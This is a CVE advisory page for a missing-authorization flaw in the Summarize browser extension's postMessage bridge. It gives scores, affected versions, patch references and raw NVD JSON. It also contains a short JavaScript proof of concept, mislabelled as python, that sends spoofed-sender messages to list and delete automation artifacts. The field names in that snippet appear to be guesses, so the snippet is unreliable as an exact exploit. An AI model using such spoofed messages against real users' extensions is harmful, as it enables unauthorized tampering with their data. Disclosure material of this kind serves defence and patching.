Security Vulnerability Report
中文
CVE-2026-45243 CVSS 6.1 MEDIUM

CVE-2026-45243

Published: 2026-05-18 19:16:28
Last Modified: 2026-05-19 01:34:19
Source: [email protected]

Description

Summarize prior to 0.15.1 contains a missing authorization vulnerability in the content script window.postMessage bridge that allows malicious pages to perform unauthorized operations on automation artifacts. Attackers can simulate runtime messages with spoofed sender identifiers to list, read, create, overwrite, or delete automation artifacts scoped to the affected tab without proper authorization checks.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:steipete:summarize:*:*:*:*:*:*:*:* - VULNERABLE
Summarize < 0.15.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-45243: Missing Authorization in Summarize Extension // This script demonstrates how a malicious page could spoof messages to manipulate artifacts. // Target the vulnerable content script via window.postMessage function exploitSummarize() { console.log("[+] Attempting to exploit CVE-2026-45243..."); // Construct a malicious payload spoofing the internal sender const maliciousPayload = { sender: "summarize-internal", // Spoofed identifier type: "COMMAND", // Message type expected by the bridge action: "DELETE_ARTIFACT", // Unauthorized action data: { id: "target_artifact_id" // Target artifact } }; // Send the message to all listeners (targeting the extension) window.postMessage(maliciousPayload, "*"); // Attempt to list artifacts to verify access const listPayload = { sender: "summarize-internal", type: "COMMAND", action: "LIST_ARTIFACTS" }; window.postMessage(listPayload, "*"); } // Execute the exploit exploitSummarize();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45243", "sourceIdentifier": "[email protected]", "published": "2026-05-18T19:16:28.387", "lastModified": "2026-05-19T01:34:18.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Summarize prior to 0.15.1 contains a missing authorization vulnerability in the content script window.postMessage bridge that allows malicious pages to perform unauthorized operations on automation artifacts. Attackers can simulate runtime messages with spoofed sender identifiers to list, read, create, overwrite, or delete automation artifacts scoped to the affected tab without proper authorization checks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:steipete:summarize:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.15.1", "matchCriteriaId": "FDA6FF18-A9BB-4892-B428-AB85BB58E16A"}]}]}], "references": [{"url": "https://github.com/steipete/summarize/commit/357544063af535bd574752622f9eb94be33ee5fd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/steipete/summarize/pull/222", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/steipete/summarize/releases/tag/v0.15.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/summarize-browser-extension-missing-authorization-via-content-script", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.